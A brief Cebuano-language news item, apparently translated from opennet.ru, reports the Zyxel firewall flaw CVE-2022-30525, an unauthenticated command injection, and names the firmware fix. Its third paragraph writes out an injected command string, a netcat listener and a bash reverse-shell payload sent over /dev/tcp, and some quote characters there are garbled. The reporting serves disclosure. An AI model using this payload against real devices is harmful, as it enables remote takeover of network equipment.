Pagkahuyang sa mga firewall sa Zyxel nga nagtugot sa pagpatuman sa code nga wala’y panghimatuud

Ang usa ka kritikal nga kahuyangan (CVE-2022-30525) nahibal-an sa mga aparato sa Zyxel sa serye sa ATP, VPN ug USG FLEX, nga gidisenyo aron maorganisar ang operasyon sa mga firewall, IDS ug VPN sa mga negosyo, nga nagtugot sa usa ka eksternal nga tig-atake sa pagpatuman sa code sa device nga walay katungod sa user nga walay panghimatuod. Aron makahimo usa ka pag-atake, ang usa ka tig-atake kinahanglan nga makapadala mga hangyo sa aparato gamit ang protocol sa HTTP/HTTPS. Giayo ni Zyxel ang pagkahuyang sa pag-update sa firmware sa ZLD 5.30. Sumala sa serbisyo sa Shodan, sa pagkakaron adunay 16213 nga posibleng huyang nga mga himan sa global nga network nga modawat sa mga hangyo pinaagi sa HTTP/HTTPS.

Ang operasyon gihimo pinaagi sa pagpadala ug espesyal nga gidisenyo nga mga sugo ngadto sa web handler /ztp/cgi-bin/handler, ma-access nga walay authentication. Ang problema tungod sa kakulang sa husto nga paglimpyo sa mga parameter sa hangyo sa dihang nagpatuman sa mga sugo sa sistema gamit ang os.system nga tawag nga gigamit sa lib_wan_settings.py library ug gipatuman sa pagproseso sa setWanPortSt nga operasyon.

Pananglitan, ang usa ka tig-atake mahimong mopasa sa string "; ping 192.168.1.210;" nga mosangpot sa pagpatuman sa "ping 192.168.1.210" nga sugo sa sistema. Aron maka-access sa command shell, mahimo nimong ipadagan ang "nc -lvnp 1270" sa imong sistema, ug dayon magsugod og balik nga koneksyon pinaagi sa pagpadala og hangyo sa device gamit ang '; bash -c \Β»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;'.

Source: opennet.ru

Idugang sa usa ka comment